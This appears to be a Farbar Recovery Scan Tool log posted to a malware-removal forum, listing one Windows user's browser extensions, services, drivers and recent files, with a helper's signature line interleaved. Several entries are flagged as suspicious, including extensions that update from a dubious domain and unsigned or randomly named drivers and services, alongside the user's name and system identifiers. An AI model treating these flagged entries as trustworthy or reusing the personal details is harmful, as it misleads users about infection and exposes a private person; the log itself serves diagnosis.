FF Extension: (Adblock Plus) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2018-10-31]
FF Extension: (Screenshoter Fixed) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\{d9babd10-47de-11df-9879-0800200c9a67}.xpi [2017-06-12] [Legacy]
FF Extension: (Skype) - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06] [Legacy]
FF HKLM\...\Firefox\Extensions: [webrootsecure@webroot.com] - C:\ProgramData\WRData\PKG\FF_WEBEX => not found
FF HKLM-x32\...\Firefox\Extensions: [webrootsecurewebextensions@webroot.com] - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_27_0_0_187.dll [2017-11-14] ()
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [No File]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [No File]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2017-09-20] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_187.dll [2017-11-14] ()
FF Plugin-x32: @esn.me/esnsonar,version=0.70.4 -> C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\npesnsonar.dll [2011-11-03] (ESN Social Software AB)
FF Plugin-x32: @esn/esnlaunch,version=2.3.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.0\npesnlaunch.dll [2013-09-16] (ESN Social Software AB)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-07] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.40.2 -> C:\Windows\SysWOW64\npDeployJava1.dll [2015-03-30] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.40.2 -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\plugin2\npjp2.dll [2015-03-30] (Oracle Corporation)
FF Plugin-x32: @kuaiyong.yrtd.com,version=1.0.1.1 -> C:\Program Files (x86)\kuaiyong\np_kyplugin.dll [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-05] (Microsoft Corporation)
FF Plugin-x32: @perfectworld.com/npArcPlayNowPlugin -> C:\Program Files (x86)\Perfect World Entertainment\Arc\plugins\npArcPluginFF.dll [2017-04-28] (Perfect World Entertainment Inc)
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-14] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-14] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-09-20] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2017-09-20] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1722513563-2756437970-1780137624-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Betts\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-01-23] (Unity Technologies ApS)
StartMenuInternet: Firefox- - kernel32::GetLongPathNameW(w R8, w .R7, I 1024)I .R6
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-08-22] <==== ATTENTION

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com/
CHR RestoreOnStartup: Default -> "hxxp://ph.search.yahoo.com/?fr=hp-ddc-bd&type=608_pr__alt__ddc_dsssyc_bd_com"
CHR Profile: C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default [2018-11-01]
CHR Extension: (Google Docs) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-27] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx] <==== ATTENTION
CHR Extension: (Google Drive) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-02-27] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx] <==== ATTENTION
CHR Extension: (YouTube Downloader Video) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\apkpjaoijbnjlgcmjmjjmkcmojcopdip [2017-07-04]
CHR Extension: (MEGA) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2018-10-28]
CHR Extension: (YouTube) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-27]
CHR Extension: (Adblock Plus) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2018-11-01]
CHR Extension: (Google Search) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-02]
CHR Extension: (Realm of the Mad God) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhjfmaldpppkmjjgkmadddbanpabfflp [2016-07-31]
CHR Extension: (Free Chrome VPN proxy) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\domgapgimficjfpblhbihklajoofkijh [2018-03-02]
CHR Extension: (Adobe Acrobat) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-12-12]
CHR Extension: (Google Docs Offline) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-18]
CHR Extension: (Unlimited Free VPN - Hola) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2018-10-19]
CHR Extension: (Video Adblocker for Youtube™ Extension) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\hflefjhkfeiaignkclmphmokmmbhbhik [2018-08-28]
CHR Extension: (AllCast Receiver) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\hjbljnpdahefgnopeohlaeohgkiidnoe [2016-09-16]
CHR Extension: (Mauf - Custom Messenger Colors) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfjnmganegfpajpgchndgfjbljnehink [2018-05-09]
CHR Extension: (Material Deep Black Theme) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\kicomekdnoaegbahblnaiccfbcnhbfhb [2018-09-30]
CHR Extension: (Skype Click to Call) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2014-08-02] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx] <==== ATTENTION
CHR Extension: (Hotspot Shield VPN Free Proxy – Unblock Sites) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbejmccbhkncgokjcmghpfloaajcffj [2018-11-01]
CHR Extension: (Google Wallet) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-03-21] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx] <==== ATTENTION
CHR Extension: (Simple EPUB Reader) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\ojhbgcchcbdjdenibfmjofobklkkhofc [2017-07-09]
CHR Extension: (Grooveshark Downloader) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooblpjoncpjmbncgocjlnannofkjjhnp [2015-04-23] [UpdateUrl: hxxp://groovesharkdownload.net/Download/updates.xml] <==== ATTENTION
CHR Extension: (Gmail) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
CHR Extension: (Chrome Media Router) - C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-28]
CHR HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kjeghcllfecehndceplomkocgfbklffd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [ngkhgikojglcgnckopipfdajaifmmnnc] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1364904 2017-12-19] (Autodesk Inc.)
S4 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [817760 2017-09-20] (Adobe Systems Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2257016 2017-08-23] (Adobe Systems, Incorporated)
R2 AIPS; C:\Program Files (x86)\arcai.com\aips.exe [2677760 2018-05-11] (Arcai.com) [File not signed]
S4 AirPrint; C:\Program Files (x86)\AirPrint\airprint.exe [234784 2016-10-18] (Apple Inc.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2018-04-27] (Apple Inc.)
S4 ArcService; C:\Program Files (x86)\Perfect World Entertainment\Arc\ArcService.exe [87064 2017-04-28] (Perfect World Entertainment Inc)
S4 Droid4XService; C:\Program Files (x86)\Droid4X\Droid4XService.exe [279552 2016-06-13] () [File not signed]
R2 GarenaPlatform; C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\gxxsvc.exe [315712 2018-08-07] (Garena Online )
S4 Hadouken; C:\Program Files (x86)\Hadouken\hadouken.exe [4484096 2015-08-11] () [File not signed]
S4 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 KMS-R@1n; C:\Windows\KMS-R@1n.exe [26112 2018-08-23] () [File not signed]
S4 KvAppService; C:\Program Files (x86)\Keepvid\KAF\2.4.2.222\KvAppService.exe [474824 2017-03-10] (Keepvid)
R2 LDrvSvc; c:\program files (x86)\ostotosoft\drivertalent\LDrvSvc.dll [189280 2018-01-29] (OSToto Co., Ltd.)
R2 MppSvc; C:\ProgramData\{A7FB8CB9-0BE2-4c79-BB9C-01F657A649CA}\mppsvc.dll [88576 2017-12-01] () [File not signed]
S2 NFramework; C:\Users\Betts\AppData\Roaming\Microsoft\NFramework\Recovery\host.exe [8192 2018-01-14] () [File not signed]
R2 nTuneService; C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe [255008 2009-01-06] (NVIDIA)
S4 NVU; C:\Windows\nvidia\wintask.exe [329728 2014-08-31] () [File not signed]
S4 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [167424 2012-12-07] () [File not signed]
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2013-05-12] ()
S4 Realtek11nSU; C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtlService.exe [36864 2010-04-16] (Realtek) [File not signed]
S4 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
S4 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UpdateCenterService; C:\Program Files (x86)\NVIDIA Corporation\System Update\UpdateCenterService.exe [169504 2009-01-07] (NVIDIA)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)
S4 WMS; C:\Windows\wmi\netmon.exe [329728 2014-08-31] () [File not signed]
S2 workframe; C:\Users\Betts\AppData\Roaming\InternetExplorer\System32\Recovery\host.exe [8192 2018-01-14] () [File not signed]
S4 WsDrvInst; C:\Program Files (x86)\Keepvid\KeepVid Music (Desktop)\DriverInstall.exe [122488 2017-07-20] ()
S4 NvContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe" -s NvContainerLocalSystem -a -f "C:\ProgramData\NVIDIA\NvContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvContainer\plugins\LocalSystem" -r -p 30000
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
 

Broni

Malware Annihilator
===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AndnetBus; C:\Windows\System32\DRIVERS\lgandnetbus64.sys [30208 2016-08-31] (LG Electronics Inc.)
S3 AndNetDiag; C:\Windows\System32\DRIVERS\lgandnetdiag64.sys [30720 2016-08-24] (LG Electronics Inc.)
S3 ANDNetModem; C:\Windows\System32\DRIVERS\lgandnetmodem64.sys [37376 2016-08-24] (LG Electronics Inc.)
S3 BthAvrcp; C:\Windows\System32\DRIVERS\BthAvrcp.sys [29184 2009-08-13] (CSR, plc)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 HtcUsbMdmV64; C:\Windows\System32\DRIVERS\HtcUsbMdmV64.sys [121800 2010-03-08] (QUALCOMM Incorporated)
R2 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R3 NVR0Dev; C:\Windows\nvoclk64.sys [40480 2009-01-06] (NVIDIA Corp.)
R2 NVR0FLASHDev; C:\Windows\nvflsh64.sys [40992 2009-01-07] (NVIDIA Corp.)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38032 2015-03-14] (NVIDIA Corporation)
S3 PAC7302; C:\Windows\System32\DRIVERS\PAC7302.SYS [532480 2009-04-28] (PixArt Imaging Inc.)
S3 qcusbser; C:\Windows\System32\DRIVERS\qcusbser.sys [254520 2017-03-15] (QUALCOMM Incorporated)
S3 SaiK0836; C:\Windows\System32\DRIVERS\SaiK0836.sys [172040 2010-06-17] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [22792 2010-07-08] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [50056 2010-07-08] (Saitek)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42184 2013-09-18] (Anchorfree Inc.)
R3 USBPcap; C:\Windows\System32\DRIVERS\USBPcap.sys [38456 2017-08-21] (USBPcap)
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB)
R2 WinisoCDBus; C:\Windows\System32\drivers\WinisoCDBus.sys [204032 2013-12-10] (WinISO.com)
R2 WinRing0_1_2_0; D:\steam\steamapps\common\EVGA PrecisionX\WinRing0\WinRing0x64.sys [14536 2018-09-28] (OpenLibSys.org)
S3 wrUrlFlt; C:\Windows\system32\DRIVERS\wrUrlFlt.sys [67024 2017-12-07] (Webroot)
R3 WsAudioDevice_383S(1); C:\Windows\System32\drivers\WsAudioDevice_383S(1).sys [39016 2017-06-14] (Wondershare)
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
S3 GGSAFERDriver; \??\C:\Program Files (x86)\Garena Plus\Room\safedrv.sys [X]
S3 gkernel; \??\C:\Users\Betts\AppData\Local\Temp\gkernel.sys [X] <==== ATTENTION
S0 hQjWNzqD; System32\drivers\hQjWNzqD.sys [X]
S0 kzeXHiXd; System32\drivers\kzeXHiXd.sys [X]
S2 memudrv; \??\D:\Program Files\Microvirt\MEmuHyperv\MEmuDrv.sys [X]
S0 pzLPPFej; System32\drivers\pzLPPFej.sys [X]
U0 SR; no ImagePath
U2 srservice; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-11-01 13:17 - 2018-11-01 13:18 - 000040714 _____ C:\Users\Betts\Desktop\FRST.txt
2018-11-01 12:02 - 2018-11-01 12:02 - 000555283 _____ C:\Users\Betts\Downloads\PEDIA2-GI-Part-II-Cases-Bei.pdf
2018-11-01 11:45 - 2018-11-01 11:45 - 000000000 ____D C:\Users\Betts\Desktop\FRST-OlderVersion
2018-11-01 11:44 - 2018-11-01 13:17 - 000000000 ____D C:\FRST
2018-11-01 11:42 - 2018-11-01 11:45 - 002414592 _____ (Farbar) C:\Users\Betts\Desktop\FRST64.exe
2018-11-01 11:41 - 2018-11-01 11:41 - 015065792 _____ (Microsoft Corporation) C:\Users\Betts\Downloads\mseinstall64.exe
2018-11-01 11:11 - 2018-11-01 11:11 - 005581928 _____ (COMODO) C:\Users\Betts\Downloads\cispremium_installer.exe
2018-10-31 18:45 - 2018-10-31 18:54 - 123222368 _____ C:\Users\Betts\Desktop\open_gapps-arm-8.1-pico-20181031.zip
2018-10-30 20:08 - 2018-10-30 20:08 - 000000199 _____ C:\Users\Betts\Desktop\Counter-Strike Global Offensive.url
2018-10-30 18:24 - 2018-10-30 18:24 - 000000000 ____D C:\Users\Betts\Desktop\Big K.R.I.T. - 4eva Is A Mighty Long Time
2018-10-30 16:41 - 2018-10-30 17:58 - 560416716 _____ C:\Users\Betts\Downloads\Big K.R.I.T. - 4eva Is A Mighty Long Time.zip
2018-10-30 16:38 - 2018-10-30 16:38 - 000000000 ____D C:\ProgramData\NovaRad
2018-10-30 16:37 - 2018-10-30 16:37 - 000000000 ____D C:\Users\Betts\AppData\Local\Novarad
2018-10-30 15:18 - 2018-02-21 00:38 - 000000000 ____D C:\Users\Betts\Desktop\4-44
2018-10-30 14:36 - 2018-10-30 14:53 - 479600294 _____ C:\Users\Betts\Downloads\4-44 MASTER.zip
2018-10-28 17:51 - 2018-10-28 18:14 - 087644611 _____ C:\Users\Betts\Desktop\open_gapps-arm64-8.1-pico-20181028.zip
2018-10-28 15:59 - 2018-10-28 17:51 - 351711284 _____ C:\Users\Betts\Desktop\AospExtended-v5.6-fortunave3g-20180612-1437-UNOFFICIAL.zip
2018-10-28 11:50 - 2018-10-28 11:50 - 000000000 ____D C:\Users\Betts\Desktop\Wet Bandits
2018-10-28 10:11 - 2018-10-28 10:11 - 000000000 ____D C:\Program Files\mmpicker
2018-10-28 10:10 - 2018-10-28 10:10 - 001074790 _____ C:\Users\Betts\Downloads\matchmaking_server_picker_473.zip
2018-10-28 08:15 - 2018-10-28 08:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CSGO WaRzOnE
2018-10-28 08:15 - 2018-10-28 08:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Counter Strike Global Offensive Warzone
2018-10-28 01:17 - 2018-10-28 08:27 - 000001529 _____ C:\Users\Public\Desktop\Counter Strike Global Offensive Warzone.lnk
2018-10-28 01:06 - 2018-10-28 01:06 - 000000000 ____D C:\Program Files (x86)\Warzone
2018-10-27 22:01 - 2018-10-27 22:10 - 069490870 _____ C:\Users\Betts\Downloads\BALLADS 1.zip
2018-10-27 08:21 - 2018-10-27 08:21 - 000000000 ____D C:\ProgramData\Caphyon
2018-10-27 08:07 - 2015-03-16 13:58 - 000444840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshflxgd.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000660120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscomct2.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000416408 _____ (Microsoft Corporation ) C:\Windows\SysWOW64\comct332.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000279192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdatgrd.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000253080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdatlst.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000222360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tabctl32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000219288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\richtx32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000218776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dblist32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000212112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mci32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000179352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmask32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000170920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comct232.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000127640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswinsck.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000119960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscomm32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000104088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\picclp32.ocx
2018-10-27 08:07 - 2013-11-25 06:27 - 000084624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sysinfo.ocx
2018-10-27 08:07 - 2011-01-12 13:36 - 001054208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71u.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71deu.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71ita.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71fra.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71esp.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000057344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71enu.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71kor.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71jpn.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000045056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71cht.dll
2018-10-27 08:07 - 2011-01-12 13:25 - 000040960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71chs.dll
2018-10-27 08:07 - 2011-01-12 12:53 - 000090112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\atl71.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70ita.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70fra.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70esp.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70deu.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000057344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70enu.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70kor.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70jpn.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000045056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70cht.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000040960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70chs.dll
2018-10-27 08:07 - 2006-08-25 23:17 - 000086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\atl70.dll
2018-10-27 08:07 - 2001-08-23 00:00 - 001355776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvbvm50.dll
2018-10-27 08:07 - 1996-01-12 03:00 - 000722192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vb40032.dll
2018-10-27 08:07 - 1993-07-23 19:31 - 000210944 _____ C:\Windows\SysWOW64\msvcrt10.dll
2018-10-27 08:05 - 2018-10-27 08:05 - 000000218 _____ C:\Users\Betts\AppData\Local\recently-used.xbel
2018-10-26 22:45 - 2018-10-26 23:04 - 000000000 ____D C:\Users\Betts\Downloads\Counter Strike Global Offensive - Warzone
2018-10-24 22:44 - 2018-10-24 22:47 - 1528281108 _____ C:\Users\Betts\Downloads\PCSB00877_LSWTFA_01.00.VPK
2018-10-24 01:06 - 2018-10-24 01:06 - 001013569 _____ C:\Users\Betts\Downloads\precal1-week1-worksheet-answers.pdf
2018-10-23 22:48 - 2018-10-23 22:49 - 004138936 _____ C:\Users\Betts\Downloads\CPAR-Report.pptx
2018-10-23 22:05 - 2018-10-23 22:05 - 003037397 _____ C:\Users\Betts\Downloads\drive-download-20181023T140521Z-001.zip
2018-10-23 20:31 - 2018-10-23 20:31 - 000725009 _____ C:\Users\Betts\Downloads\Activity-4.5-Conic5s-Multiple-Choice-11B.pdf
2018-10-23 20:31 - 2018-10-23 20:31 - 000142872 _____ C:\Users\Betts\Downloads\Activity-4.2-Parabola-11B.pdf
2018-10-23 20:31 - 2018-10-23 20:31 - 000138356 _____ C:\Users\Betts\Downloads\Activity-4.4-Hyperbola-11B.pdf
2018-10-23 20:31 - 2018-10-23 20:31 - 000135464 _____ C:\Users\Betts\Downloads\Activity-4.3-Ellipse-11B-1.pdf
2018-10-23 20:29 - 2018-10-23 20:29 - 000143109 _____ C:\Users\Betts\Downloads\Activity-4.1-Circle-11B.pdf
2018-10-21 23:35 - 2018-10-21 23:35 - 027335038 _____ C:\Users\Betts\Downloads\[GamesMega]S.F.X.T(UPDATE1.08+AllDLC)[PCSE00005].rar
2018-10-21 23:00 - 2018-10-21 23:01 - 006835065 _____ C:\Users\Betts\Downloads\[GamesMega]HotlineMiami[PCSE00249_patch].zip
2018-10-21 22:42 - 2018-10-21 22:42 - 028213567 _____ C:\Users\Betts\Downloads\SFxT [US] Update 1.08.ZIP
2018-10-21 18:07 - 2018-10-21 18:08 - 008742877 _____ C:\Users\Betts\Downloads\UMvC3 UpDate+DLC [GamesMega.Net].rar
2018-10-21 16:38 - 2018-10-21 16:38 - 154723205 _____ C:\Users\Betts\Downloads\PCSE00597_Titan_Souls_01.00.VPK
2018-10-21 00:56 - 2018-10-21 01:22 - 1420803609 _____ C:\Users\Betts\Downloads\PCSB00070_UMvC3_01.00_C5_V2.0_TEST_WORKING.vpk
2018-10-20 23:43 - 2018-10-20 23:43 - 126117479 _____ C:\Users\Betts\Downloads\Hotline Miami.VPK
2018-10-20 14:05 - 2018-10-20 14:06 - 011095728 _____ C:\Users\Betts\Downloads\Crash of the Titans (E)(sUppLeX).zip
